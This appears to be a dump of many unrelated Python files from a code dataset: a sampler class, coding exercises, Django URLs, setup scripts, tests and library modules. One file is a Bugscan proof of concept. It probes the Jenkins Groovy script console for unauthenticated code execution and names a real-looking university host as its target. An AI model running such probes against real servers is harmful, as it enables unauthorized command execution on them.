IterationStopCriteriaStrategy is used :param initPositionGenerator: the generator for the init walker position. Default is None an then SampleBallPositionGenerator is used :param fileUtil: util used to store the results :param threadCount: The count of threads to be used for the computation. Default is 1 :param reuseBurnin: Flag if the burn in should be reused. If true the values will be read from the file System. Default is False """ def __init__(self, params,likelihoodComputationChain, filePrefix, walkersRatio, burninIterations, sampleIterations, FiducialParams, param_legend, LowerBound_XRAY, UpperBound_XRAY, SpinTz, filethin = 1, stopCriteriaStrategy=None, initPositionGenerator=None, storageUtil=None, threadCount=1, reuseBurnin=False): """ CosmoHammer sampler implementation """ self.likelihoodComputationChain = likelihoodComputationChain self.walkersRatio = walkersRatio self.reuseBurnin = reuseBurnin self.filePrefix = filePrefix self.threadCount = threadCount self.paramCount = len(params[:,0]) self.nwalkers = self.paramCount*walkersRatio self.burninIterations = burninIterations self.sampleIterations = sampleIterations self.filethin = filethin self.FiducialParams = FiducialParams self.param_legend = param_legend self.LowerBound_XRAY = LowerBound_XRAY self.UpperBound_XRAY = UpperBound_XRAY self.SpinTz = SpinTz self.lowerbounds = params[:,0] self.upperbounds = params[:,1] assert sampleIterations > 0, "CosmoHammer needs to sample for at least one iterations" # setting up the logging self._configureLogging(filePrefix+c.LOG_FILE_SUFFIX) self.log("Using CosmoHammer "+str(CosmoHammer_21CMMC.__version__)) # The sampler object self._sampler = self.createEmceeSampler(likelihoodComputationChain) if(storageUtil is None): storageUtil = self.createSampleFileUtil() self.storageUtil = storageUtil if(stopCriteriaStrategy is None): stopCriteriaStrategy = self.createStopCriteriaStrategy() stopCriteriaStrategy.setup(self) self.stopCriteriaStrategy = stopCriteriaStrategy if(initPositionGenerator is None): initPositionGenerator = self.createInitPositionGenerator() initPositionGenerator.setup(self) self.initPositionGenerator = initPositionGenerator def _configureLogging(self, filename): logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', filename=filename, filemode='w', level=logging.INFO) def createStopCriteriaStrategy(self): """ Returns a new instance of a stop criteria stategy """ return 
IterationStopCriteriaStrategy() def createSampleFileUtil(self): """ Returns a new instance of a File Util """ return SampleFileUtil(self.filePrefix, reuseBurnin=self.reuseBurnin) def createInitPositionGenerator(self): """ Returns a new instance of a Init Position Generator """ """ This needs to me made more intelligent, rather than being hard coded! """ return UniformPosition() # @profile def startSampling(self): """ Launches the sampling """ self.log(self.__str__()) if(self.burninIterations>0): if(self.reuseBurnin): pos, prob, NF_Values_old, rstate = self.loadBurnin() datas = [None]*len(pos) if 'singlez' in self.filePrefix: NF_Values = [[float(q)] for q in NF_Values_old] NF_Values = np.array(NF_Values) else: NF_Values = NF_Values_old else: pos, prob, NF_Values, rstate, datas = self.startSampleBurnin() else: pos = self.createInitPos() prob = None NF_Values = None rstate = None datas = None # Starting from the final position in the burn-in chain, sample for 1000 # steps. self.log("start sampling after burn in") start = time.time() self.sample(pos, prob, NF_Values, rstate, datas) end = time.time() self.log("sampling done! Took: " + str(round(end-start,4))+"s") # Print out the mean acceptance fraction. In general, acceptance_fraction # has an entry for each walker self.log("Mean acceptance fraction:"+ str(round(np.mean(self._sampler.acceptance_fraction), 4))) def loadBurnin(self): """ loads the burn in form the file system """ self.log("reusing previous burn in") pos = self.storageUtil.importFromFile(self.filePrefix+c.BURNIN_SUFFIX)[-self.nwalkers:] prob = self.storageUtil.importFromFile(self.filePrefix+c.BURNIN_PROB_SUFFIX)[-self.nwalkers:] NF_Values = self.storageUtil.importFromFile(self.filePrefix+c.BURNIN_NF_SUFFIX)[-self.nwalkers:] rstate= self.storageUtil.importRandomState(self.filePrefix+c.BURNIN_STATE_SUFFIX) self.log("loading done") return pos, prob, NF_Values, rstate # @profile def startSampleBurnin(self): """ Runs the sampler for the burn in """ self.log("start burn in") start = time.time() p0 = self.createInitPos() pos, prob, NF_Values, rstate, data = self.sampleBurnin(p0) end = time.time() self.log("burn in sampling done! Took: " + str(round(end-start,4))+"s") self.log("Mean acceptance fraction for burn in:" + str(round(np.mean(self._sampler.acceptance_fraction), 4))) self.resetSampler() return pos, prob, NF_Values, rstate, data def resetSampler(self): """ Resets the emcee sampler in the master node """ if self.isMaster(): self.log("Reseting emcee sampler") # Reset the chain to remove the burn-in samples. 
self._sampler.reset() # @profile def sampleBurnin(self, p0): """ Run the emcee sampler for the burnin to create walker which are independent form their starting position """ counter = 1 counter_thin = 0 for pos, prob, neutral_fractions, rstate, datas in self._sampler.sample(p0, iterations=self.burninIterations): if self.isMaster(): counter_thin += 1 if(counter_thin==self.filethin): self.storageUtil.persistBurninValues(pos, prob, neutral_fractions, datas) counter_thin = 0 if(counter%10==0): self.log("Iteration finished:" + str(counter)) counter = counter + 1 if self.isMaster(): self.log("storing random state") self.storageUtil.storeRandomState(self.filePrefix+c.BURNIN_STATE_SUFFIX, rstate) return pos, prob, neutral_fractions, rstate, datas # @profile def sample(self, burninPos, burninProb=None, burninNF_Values=None, burninRstate=None, datas=None): """ Starts the sampling process """ counter = 1 counter_thin = 0 for pos, prob, NF_Values, _, datas in self._sampler.sample(burninPos, lnprob0=burninProb, neutral_fractions0=burninNF_Values, rstate0=burninRstate, blobs0=datas, iterations=self.sampleIterations): if self.isMaster(): counter_thin += 1 if(counter_thin==self.filethin): self.storageUtil.persistSamplingValues(pos, prob, NF_Values, datas) counter_thin = 0 if(self.stopCriteriaStrategy.hasFinished()): break if(counter%10==0): self.log("Iteration finished:" + str(counter)) counter = counter + 1 def isMaster(self): """ Returns True. Can be overridden for multitasking i.e. with MPI """ return True def log(self, message): """ Logs a message to the logfile """ logging.info(message) def createEmceeSampler(self, callable): """ Factory method to create the emcee sampler """ self.log("Using emcee "+str(emcee.__version__)) # print 'Create the Emcee Sampler' return emcee.EnsembleSampler(self.nwalkers, self.paramCount, callable, lower_bounds=self.lowerbounds, upper_bounds=self.upperbounds, threads=self.threadCount) def createInitPos(self): """ Factory method to create initial positions """ return self.initPositionGenerator.generate() def getChain(self): """ Returns the sample chain """ return self._sampler.chain() def __str__(self, *args, **kwargs): """ Returns the string representation of the sampler config """ desc = "Sampler: " + str(type(self))+"\n" \ "configuration: \n" \ " Burnin iterations: " +str(self.burninIterations)+"\n" \ " Samples iterations: " +str(self.sampleIterations)+"\n" \ " Walkers ratio: " +str(self.walkersRatio)+"\n" \ " Reusing burn in: " +str(self.reuseBurnin)+"\n" \ " init pos generator: " +str(self.initPositionGenerator)+"\n" \ " stop criteria: " +str(self.stopCriteriaStrategy)+"\n" \ " storage util: " +str(self.storageUtil)+"\n" \ "likelihoodComputationChain: \n" + str(self.likelihoodComputationChain) \ +"\n" return desc
1.382813
1
HackerRank/Interview Preparation Kit/Warm-up Challenges/Jumping-on-the-Clouds.py
nayanapardhekar/Python
37
12756267
<filename>HackerRank/Interview Preparation Kit/Warm-up Challenges/Jumping-on-the-Clouds.py n=int(input()) a=list(map(int,input().split())) jump=0 i=0 while i<=n: if i+2<n and a[i+2]==0: jump+=1 i+=2 elif i+1<n and a[i+1]==0: jump+=1 i+=1 else: i+=1 print(jump)
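
# Worked example (added for illustration): with n = 7 and clouds 0 0 1 0 0 1 0,
# the greedy loop above jumps 0 -> 1 -> 3 -> 4 -> 6 and prints 4.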
2.4375
2
Week 3/ex4.py
rmit-s3559384-andrew-alvaro/IoT
0
12756395
<reponame>rmit-s3559384-andrew-alvaro/IoT from virtual_sense_hat import VirtualSenseHat sense = VirtualSenseHat.getSenseHat() # OR # sense = VirtualSenseHat.getSenseHat(False) temperature = sense.get_temperature() sense.show_message('Temperature: {0:0.1f} *C'.format(temperature)) humidity = sense.get_humidity() sense.show_message('Humidity: {0:0.0f}%'.format(humidity)) sense.clear()
1.328125
1
test_kivy/test_kvv/Ba/tela.py
robertoweller/python
2
12756523
<filename>test_kivy/test_kvv/Ba/tela.py
def tam():
    '''In the future, make it easier to change how the size of the pieces is set.'''
    tel = 1.25
    return tel
0.894531
1
backend/polzyFunctions/tests/conftest.py
Athos1972/PoLZy
0
12756651
import pytest
from polzybackend import create_app, models, db
from config import Config
from copy import deepcopy
import polzyFunctions
import os

if not os.path.basename(os.getcwd()) == "tests":
    os.chdir(os.path.join(os.path.dirname(polzyFunctions.__file__), "tests"))


@pytest.fixture(scope="session", params=["pqa"])
def stage(request):
    return request.param


@pytest.fixture
def user(stage=stage, email="<EMAIL>"):
    """
    A user is read from the database. If nothing is stated, it will be <EMAIL>
    from stage = PQA.
    :param stage:
    :param email:
    :return:
    """
    app = create_app(Config)
    app.app_context().push()
    with db.session.no_autoflush:
        user = deepcopy(db.session.query(models.User).filter_by(email=email).first())
    user.stage = stage
    yield user
    db.session.remove()
1.367188
1
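A hypothetical test that consumes the fixtures above; the asserted attributes follow the fixture code, but the User model itself is an assumption.
def test_user_fixture_returns_pqa_user(user, stage):
    # "stage" is parametrized with "pqa" and copied onto the user by the fixture
    assert stage == "pqa"
    assert user.stage == stage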
container/__init__.py
sdss/lvmtan
0
12756779
<gh_stars>0 # -*- coding: utf-8 -*- # # @Author: <NAME> (<EMAIL> # @Date: 2021-06-15 # @Filename: __init__.py # @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause) import os import shlex import subprocess import sys import time from pathlib import PosixPath import click import pexpect # from podman import PodmanClient # uri = "unix:///run/user/1000/podman/podman.sock" # podman container exists ubuntu_lvmt_tan # 0=True, 1=False container_bin = "podman" lvmt_root = os.environ["PWD"] lvmt_image_source_local = "localhost" lvmt_image_source_remote = "ghcr.io/sdss" lvmt_image_name = "lvmtan" default_basdard_test = "test.first.focus_stage" def config(name, pstfx="-sim.conf"): return f"{'/'.join(str.split(name,'.')[:-1])}/{name}{pstfx}" def isRunning(name: str = default_basdard_test): command = subprocess.run(shlex.split(f"{container_bin} container exists {name}")) return not command.returncode # True if running def getXauthority(): for xa in [f"/run/user/{os.getuid()}/gdm/Xauthority", "~/.Xauthority"]: xa = PosixPath(xa).expanduser() if xa.exists(): return xa return None @click.command() @click.option("--lvmt_root", default=lvmt_root, type=str) @click.option("--use-cache/--no-cache", default=True) def build(lvmt_root: str, use_cache: bool): tan_dockerfile = f"{lvmt_root}/container" lvmt_image_fullbuild = "" if use_cache else " --no-cache" print( f"{container_bin} build --tag {lvmt_image_name}{lvmt_image_fullbuild} --rm {tan_dockerfile}" ) build = f"{container_bin} build --tag {lvmt_image_name}{lvmt_image_fullbuild} --rm {tan_dockerfile}" command = subprocess.run(shlex.split(build)) @click.command() @click.option("--lvmt_root", default=lvmt_root, type=str) @click.option("--with-ui/--without-ui", default=True) @click.option("--with-hw/--without-hw", default=False) @click.option("--debug/--no-debug", "-d", default=False) @click.option("--kill/--no-kill", default=False) @click.option("--name", "-n", default=default_basdard_test, type=str) def start(name: str, with_ui: bool, with_hw: bool, lvmt_root: str, debug:bool, kill:bool): if not subprocess.run(shlex.split(f"podman image exists {lvmt_image_source_local}/{lvmt_image_name}")).returncode: lvmt_image = f"{lvmt_image_source_local}/{lvmt_image_name}" else: if subprocess.run(shlex.split(f"podman image exists {lvmt_image_source_remote}/{lvmt_image_name}")).returncode: subprocess.run(shlex.split(f"podman pull {lvmt_image_source_remote}/{lvmt_image_name}:latest")) lvmt_image = f"{lvmt_image_source_remote}/{lvmt_image_name}" if kill: subprocess.run(shlex.split(f"{container_bin} kill {name}")) run_base = f"--rm -t --name {name} --network=host" if os.path.exists("/usr/bin/crun"): run_base += f" --runtime /usr/bin/crun" system_xauthority = getXauthority() if with_ui and os.environ.get("DISPLAY") and system_xauthority: run_base += f" -e DISPLAY -v {system_xauthority}:/root/.Xauthority:Z --ipc=host" if os.path.exists("/dev/dri"): run_base += " --device /dev/dri" name_ui = config(name, pstfx=".ui") if os.path.exists(f"{lvmt_root}/config/{name_ui}"): run_base += f" -e BASDARD_UI={name_ui}" print(debug) if debug: run_base += f" -e TAN_DEBUG=true" run_with_hw = "-svr.conf" if with_hw else "-sim.conf" run_tan = f"-v {lvmt_root}:/root/lvmt:Z -e BASDARD_CONFIG={config(name, pstfx = run_with_hw)}" run = f"{container_bin} run {run_base} {run_tan} {lvmt_image}" print(run) child = pexpect.spawn(run) child.expect("Connected to") assert isRunning(name) == True @click.command() @click.option("--name", "-n", default=default_basdard_test, type=str) def 
stop(name: str): command = subprocess.run(shlex.split(f"{container_bin} kill {name}"))
1.578125
2
setup.py
oogles/django-project-base
0
12756907
<gh_stars>0
import re
from setuptools import setup, find_packages
from codecs import open  # To use a consistent encoding
from os import path

here = path.abspath(path.dirname(__file__))
source_dir = ''  # the name of the directory containing the source, relative to "here"

# Read the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()

# Read the version from __init__.py
version_re = r'^__version__ = [\'"]([^\'"]*)[\'"]'
init_path = path.join(here, source_dir, '__init__.py')
with open(init_path) as f:
    match = re.search(version_re, f.read(), re.MULTILINE)
    if match:
        version = match.group(1)
    else:
        raise RuntimeError('Unable to find __version__ in {0}'.format(init_path))

setup(
    name='',
    version=version,
    description='',
    long_description=long_description,
    license='MIT',
    url='',
    author='',
    author_email='',
    packages=find_packages(exclude=['docs']),
    # install_requires=,
    # python_requires=
    classifiers=[
    ]
)
1.484375
1
django_dvbboxes/urls.py
drowolath/django-dvbboxes
1
12757035
from django.conf.urls import url

from . import views

app_name = 'django_dvbboxes'

urlpatterns = [
    # views.media urls
    url(r'media/check/$', views.media, name='media_check'),
    url(r'media/search/$', views.media, name='media_search'),
    url(r'media/delete/(?P<filename>\w+)/$', views.media, name='media_delete'),
    url(r'media/rename/(?P<filename>\w+)/$', views.media, name='media_rename'),
    url(r'media/(?P<filename>\w+)/$', views.media, name='media_infos'),
    # views.listing urls
    url(r'listing/apply/$', views.listing, name='applylisting'),
    url(r'listing/$', views.listing, name='listing'),
    # views.program urls
    url(r'program/$', views.program, name='program'),
    url(r'^$', views.index, name='index'),
]
0.769531
1
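A sketch of how the named routes above are typically resolved in application code; the filename value and the include prefix are assumptions.
from django.urls import reverse

# resolves to "<include-prefix>/media/movie01/" once this URLconf is included
# under the "django_dvbboxes" application namespace
url = reverse("django_dvbboxes:media_infos", kwargs={"filename": "movie01"})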
Python/EXERCICIOS/Strings/Desafio024 - Strings.py
ccpn1988/Python
0
12757163
<reponame>ccpn1988/Python
# Check whether the city typed by the user starts with the name SANTO:
cidade = str(input('Digite a cidade em que nasceu... ')).strip()
print(cidade[:5].upper() == 'SANTO')
2.34375
2
aiobungie/undefined.py
nxtlo/aiobungie
36
12757291
# MIT License
#
# Copyright (c) 2020 - Present nxtlo
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

"""An undefined type object."""

from __future__ import annotations

import typing

_T = typing.TypeVar("_T", covariant=True)


class UndefinedType:
    """An `UNDEFINED` type."""

    __instance: typing.ClassVar[UndefinedType]

    def __bool__(self) -> typing.Literal[False]:
        return False

    def __repr__(self) -> str:
        return "UNDEFINED"

    def __str__(self) -> str:
        return "UNDEFINED"

    def __new__(cls) -> UndefinedType:
        try:
            return cls.__instance
        except AttributeError:
            o = super().__new__(cls)
            cls.__instance = o
            return cls.__instance


Undefined: typing.Final[UndefinedType] = UndefinedType()
"""An undefined type for attribs that may be undefined and not None."""

UndefinedOr = typing.Union[UndefinedType, _T]
"""A union version of the Undefined type which can be undefined or any other type."""
1.546875
2
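A short illustration of how a sentinel like this is typically consumed; the function below is an example, not part of the aiobungie API, and assumes the names Undefined and UndefinedOr from the module above are importable.
def describe(name: UndefinedOr[str] = Undefined) -> str:
    # the identity check distinguishes "not passed" from None or an empty string
    if name is Undefined:
        return "no name supplied"
    return f"name={name}"

print(describe())         # no name supplied
print(describe("Crota"))  # name=Crota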
Bugscan_exploits-master/exp_list/exp-1667.py
csadsl/poc_exp
11
12757419
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name : jenkins_script_console_java_execution
Author : fenyouxiangyu
mail : <EMAIL>
Referer : http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
"""
# Description : This module uses the Jenkins Groovy script console to execute OS commands using Java.
# Command : println "netstat -aon".execute().text

import urlparse


def assign(service, arg):
    if service == 'jenkins':
        return True, arg


def audit(arg):
    add_url = 'script/'
    url = arg + add_url
    payload = 'script=println%28Jenkins%29&json=%7B%22script%22%3A+%22println%28Jenkins%29%22%2C+%22%22%3A+%22%22%7D'
    code, head, res, errcode, _ = curl.curl2(url, payload)
    if code == 200 and 'class jenkins.model.Jenkins' in res:
        security_hole(url)


if __name__ == '__main__':
    from dummy import *
    audit(assign('jenkins', 'http://sinv-56038.edu.hsr.ch/jenkins/')[1])
1.390625
1
python_packages/pytorch/4_extending_with_python/CUDACpp_exts/2_PMTS_custom_cuda_kernel/setup.py
trisct/Software-Tutorials
2
12757547
from setuptools import setup
from torch.utils.cpp_extension import BuildExtension, CUDAExtension

# [!!!] be sure to use different file names for cpp and cu files
# because `setuptools` does not see the filename extension
setup(
    name='PMTS_cuda',
    ext_modules=[
        CUDAExtension('PMTS_cuda', [
            'PMTS_cuda.cpp',
            'PMTS_cuda_kernels.cu',
        ])
    ],
    cmdclass={
        'build_ext': BuildExtension
    })
0.644531
1
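Once built (for example with `pip install .`), the compiled extension is imported like a regular module; the entry point used below is an assumption, since the record only shows the build script, not the C++ bindings.
import torch
import PMTS_cuda  # compiled from PMTS_cuda.cpp + PMTS_cuda_kernels.cu

x = torch.randn(8, 8, device="cuda")
# out = PMTS_cuda.forward(x)  # hypothetical binding exposed by PMTS_cuda.cpp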
ohmystars/tests.py
wolfg1969/oh-my-stars
76
12757675
import unittest

from index import update_inverted_index

__author__ = 'guoyong'


class IndexTest(unittest.TestCase):

    def setUp(self):
        self.index = {
            'python': []
        }

    def test_update_inverted_index_empty(self):
        update_inverted_index(self.index, 'python', 1, 2, 3)
        self.assertEqual([1, 2, 3], self.index.get('python'))

    def test_update_inverted_index_duplicate_item(self):
        update_inverted_index(self.index, 'python', 1, 2, 3)
        update_inverted_index(self.index, 'python', 3)
        self.assertEqual([1, 2, 3], self.index.get('python'))

    def test_update_inverted_index_sorted(self):
        update_inverted_index(self.index, 'python', 3, 1, 2)
        self.assertEqual([1, 2, 3], self.index.get('python'))
1.5
2
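A minimal implementation that would satisfy the three tests above; the real oh-my-stars code may differ, so treat this as a sketch.
def update_inverted_index(index, term, *item_ids):
    items = set(index.get(term, []))
    items.update(item_ids)       # duplicates collapse in the set
    index[term] = sorted(items)  # posting list stays sorted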
venv/lib/python3.7/site-packages/MDAnalysis/analysis/__init__.py
dtklinh/GBRDE
2
12757803
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*- # vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 # # MDAnalysis --- https://www.mdanalysis.org # Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors # (see the file AUTHORS for the full list of names) # # Released under the GNU Public Licence, v2 or any higher version # # Please cite your use of MDAnalysis in published work: # # <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, # <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>. # MDAnalysis: A Python package for the rapid analysis of molecular dynamics # simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th # Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy. # doi: 10.25080/majora-629e541a-00e # # <NAME>, <NAME>, <NAME>, and <NAME>. # MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations. # J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787 # """ :mod:`MDAnalysis.analysis` --- Analysis code based on MDAnalysis ================================================================ The :mod:`MDAnalysis.analysis` sub-package contains various recipes and algorithms that can be used to analyze MD trajectories. If you use them please check if the documentation mentions any specific caveats and also if there are any published papers associated with these algorithms. Available analysis modules -------------------------- :mod:`~MDAnalysis.analysis.align` Fitting and aligning of coordinate frames, including the option to use a sequence alignment to define equivalent atoms to fit on. :mod:`~MDAnalysis.analysis.contacts` Analyse the number of native contacts relative to a reference state, also known as a "q1-q2" analysis. :mod:`~MDAnalysis.analysis.density` Creating and manipulating densities such as the density ow water molecules around a protein. Makes use of the external GridDataFormats_ package. :mod:`~MDAnalysis.analysis.distances` Functions to calculate distances between atoms and selections; it contains the often-used :func:`~MDAnalysis.analysis.distances.distance_array` function. :mod:`~MDAnalysis.analysis.hbonds` Analyze hydrogen bonds, including both the per frame results as well as the dynamic properties and lifetimes. :mod:`~MDAnalysis.analysis.helanal` Analysis of helices with the HELANAL_ algorithm. :mod:`~MDAnalysis.analysis.hole` Run and process output from the :program:`HOLE` program to analyze pores, tunnels and cavities in proteins. :mod:`~MDAnalysis.analysis.gnm` Gaussian normal mode analysis of MD trajectories with the help of an elastic network. :mod:`~MDAnalysis.analysis.leaflet` Find lipids in the upper and lower (or inner and outer) leaflet of a bilayer; the algorithm can deal with any deformations as long as the two leaflets are topologically distinct. :mod:`~MDAnalysis.analysis.nuclinfo` Analyse the nucleic acid for the backbone dihedrals, chi, sugar pucker, and Watson-Crick distance (minor and major groove distances). :mod:`~MDAnalysis.analysis.psa` Perform Path Similarity Analysis (PSA) on a set of trajectories to measure their mutual similarities, including the ability to perform hierarchical clustering and generate heat map-dendrogram plots. :mod:`~MDAnalysis.analysis.rdf` Calculation of pair distribution functions :mod:`~MDAnalysis.analysis.rms` Calculation of RMSD and RMSF. :mod:`~MDAnalysis.analysis.waterdynamics` Analysis of water. :mod:`~MDAnalysis.analysis.legacy.x3dna` Analysis of helicoidal parameters driven by X3DNA_. 
(Note that this module is not fully supported any more and needs to be explicitly imported from :mod:`MDAnalysis.analysis.legacy`.) .. _GridDataFormats: https://github.com/orbeckst/GridDataFormats .. _HELANAL: http://www.ccrnp.ncifcrf.gov/users/kumarsan/HELANAL/helanal.html .. _X3DNA: http://x3dna.org/ .. versionchanged:: 0.10.0 The analysis submodules are not automatically imported any more. Manually import any submodule that you need. .. versionchanged:: 0.16.0 :mod:`~MDAnalysis.analysis.legacy.x3dna` was moved to the :mod:`MDAnalysis.analysis.legacy` package """ __all__ = [ 'align', 'base', 'contacts', 'density', 'distances', 'gnm', 'hbonds', 'hydrogenbonds', 'helanal', 'hole', 'leaflet', 'nuclinfo', 'polymer', 'psa', 'rdf', 'rdf_s', 'rms', 'waterdynamics', ]
1.414063
1
the_complete_python_&_postgreSQL_developer_course/a_lottery_app/list_comprehension.py
supermonkeyparadise/python
0
12757931
<gh_stars>0
user_input = '5,4,25,18,22,9'
user_numbers = user_input.split(',')

user_numbers_as_int = []

for number in user_numbers:
    user_numbers_as_int.append(int(number))

print(user_numbers_as_int)

print([number for number in user_numbers])
print([number*2 for number in user_numbers])
print([int(number) for number in user_numbers])
2.328125
2
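For comparison, the split-and-convert steps above collapse into a single comprehension (same `user_input` as in the record):
user_numbers_as_int = [int(number) for number in user_input.split(',')]
print(user_numbers_as_int)  # [5, 4, 25, 18, 22, 9]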
program_chip.py
akashlevy/NI-RRAM-Python
0
12758059
"""Script to program a bitstream to a chip""" import argparse from nirram import NIRRAM # Get arguments parser = argparse.ArgumentParser(description="Program a bitstream to a chip.") parser.add_argument("chipname", help="chip name for logging") parser.add_argument("bitstream", help="bitstream file name") # Expect to receive two arg numbers when specifying a LRS (or HRS) range parser.add_argument("--lrs-range", nargs='+', type=float, default=[9e3, 11e3], help="target LRS") parser.add_argument("--hrs-range", nargs='+', type=float, default=[100e3, 1e9], help="target HRS") parser.add_argument("--start-addr", type=int, default=0, help="start addr") parser.add_argument("--end-addr", type=int, default=65536, help="end addr") parser.add_argument("--step-addr", type=int, default=1, help="addr step") parser.add_argument("--iterations", type=int, default=3, help="number of programming iterations") args = parser.parse_args() # Initialize NI system nisys = NIRRAM(args.chipname) # Read bitstream bitstream = open(args.bitstream).readlines() # Do operation across cells for i in range(args.iterations): for addr, bit in zip(range(args.start_addr, args.end_addr, args.step_addr), bitstream): nisys.set_addr(addr) bit = int(bit.strip()) if bit == 0: # bit 0: LRS target = nisys.target(args.lrs_range[0], args.lrs_range[1]) if bit == 1: # bit 1: HRS target = nisys.target(args.hrs_range[0], args.hrs_range[1]) print(f"Iteration {i}, Address {addr}: {target}") # Shutdown nisys.close()
2.46875
2
PyDarkLogic/MainDarkLogic/action.py
BlackWalker01/BlackLogic
6
12758187
<filename>PyDarkLogic/MainDarkLogic/action.py<gh_stars>1-10
class Action:
    def __init__(self, fun, id=None):
        self._fun = fun
        self._id = id

    def fun(self):
        return self._fun

    def id(self):
        return self._id
0.902344
1
qiniu/rs/test/rs_token_test.py
jeremybai/Easylink
1
12758315
<filename>qiniu/rs/test/rs_token_test.py
# -*- coding: utf-8 -*-
import unittest
import os
import json
from base64 import urlsafe_b64decode as decode
from base64 import urlsafe_b64encode as encode
from hashlib import sha1
import hmac
import urllib

from qiniu import conf
from qiniu import rs

conf.ACCESS_KEY = os.getenv("QINIU_ACCESS_KEY")
conf.SECRET_KEY = os.getenv("QINIU_SECRET_KEY")

bucket_name = os.getenv("QINIU_TEST_BUCKET")
domain = os.getenv("QINIU_TEST_DOMAIN")
key = 'QINIU_UNIT_TEST_PIC'


class TestToken(unittest.TestCase):

    def test_put_policy(self):
        policy = rs.PutPolicy(bucket_name)
        policy.endUser = "hello!"
        policy.returnUrl = "http://localhost:1234/path?query=hello"
        policy.returnBody = "$(sha1)"
        # Do not specify the returnUrl and callbackUrl at the same time
        policy.callbackUrl = "http://1.2.3.4/callback"
        policy.callbackBody = "$(bucket)"
        policy.saveKey = "$(sha1)"
        policy.insertOnly = 1
        policy.detectMime = 1
        policy.fsizeLimit = 1024
        policy.persistentNotifyUrl = "http://4.3.2.1/persistentNotifyUrl"
        policy.persistentOps = "avthumb/flash"

        tokens = policy.token().split(':')

        # check first part of token
        self.assertEqual(conf.ACCESS_KEY, tokens[0])
        data = json.loads(decode(tokens[2]))

        # check if same
        self.assertEqual(data["scope"], bucket_name)
        self.assertEqual(data["endUser"], policy.endUser)
        self.assertEqual(data["returnUrl"], policy.returnUrl)
        self.assertEqual(data["returnBody"], policy.returnBody)
        self.assertEqual(data["callbackUrl"], policy.callbackUrl)
        self.assertEqual(data["callbackBody"], policy.callbackBody)
        self.assertEqual(data["saveKey"], policy.saveKey)
        self.assertEqual(data["exclusive"], policy.insertOnly)
        self.assertEqual(data["detectMime"], policy.detectMime)
        self.assertEqual(data["fsizeLimit"], policy.fsizeLimit)
        self.assertEqual(data["persistentNotifyUrl"], policy.persistentNotifyUrl)
        self.assertEqual(data["persistentOps"], policy.persistentOps)

        new_hmac = encode(hmac.new(conf.SECRET_KEY, tokens[2], sha1).digest())
        self.assertEqual(new_hmac, tokens[1])

    def test_get_policy(self):
        base_url = rs.make_base_url(domain, key)
        policy = rs.GetPolicy()
        private_url = policy.make_request(base_url)

        f = urllib.urlopen(private_url)
        body = f.read()
        f.close()
        self.assertEqual(len(body) > 100, True)


class Test_make_base_url(unittest.TestCase):
    def test_unicode(self):
        url1 = rs.make_base_url('1.com', '你好')
        url2 = rs.make_base_url('1.com', u'你好')
        assert url1 == url2


if __name__ == "__main__":
    unittest.main()
1.492188
1
src/prepare.py
microsoft/verseagility
15
12758443
""" PREPARE Before running train, you need to run prepare.py with the respective task. Example (in the command line): > cd to root dir > conda activate nlp > python src/prepare.py --do_format --task 1 """ #NOTE: the following is a workaround for AML to load modules import os, sys; sys.path.append(os.path.dirname(os.path.realpath(__file__))) import os import spacy import pandas as pd import numpy as np import string import re import argparse from sklearn.model_selection import StratifiedShuffleSplit # Custom functions import sys sys.path.append('./src') import helper as he import data as dt import custom as cu logger = he.get_logger(location=__name__) class Clean(): """Text preprocessing and cleaning steps SUPPORTED LANGUAGES - EN - DE - IT - ES - FR - XX (multi - NER only) SUPPORTED MODULES - Remove Noise Remove formatting and other noise that may be contained in emails or other document types. - Get Placeholders Placeholders for common items such as dates, times, urls but also custom customer IDs. - Remove Stopwords Stopwords can be added by adding a language specific stopword file to /assets. Format: "assets/stopwords_<language>.txt". - Lemmatize """ def __init__(self, task, download_source=False, download_train=False, inference=False): self.task = task self.language = cu.params.get('language') # Load data class self.dt = dt.Data(task=self.task, inference=inference) # Download data, if needed if download_train: self.dt.download('data_dir', dir = 'data_dir', source = 'datastore') # Load spacy model self.nlp = he.load_spacy_model(language=self.language, disable=['ner','parser','tagger']) # Create stopword list stopwords_active = [] ## Load names try: names = self.dt.load('fn_names', dir = 'asset_dir', file_type = 'list') stopwords_active = stopwords_active + names except FileNotFoundError as e: logger.warning(f'[WARNING] No names list loaded: {e}') ## Load stopwords try: stopwords = self.dt.load('fn_stopwords', dir = 'asset_dir', file_type = 'list') stopwords_active = stopwords_active + stopwords except FileNotFoundError as e: logger.warning(f'[WARNING] No stopwords list loaded: {e}') ## Add to Spacy stopword list logger.warning(f'[INFO] Active stopwords list lenght: {len(stopwords_active)}') for w in stopwords_active: self.nlp.vocab[w.replace('\n','')].is_stop = True def remove(self, line, rm_email_formatting=False, rm_email_header=False, rm_email_footer=False, 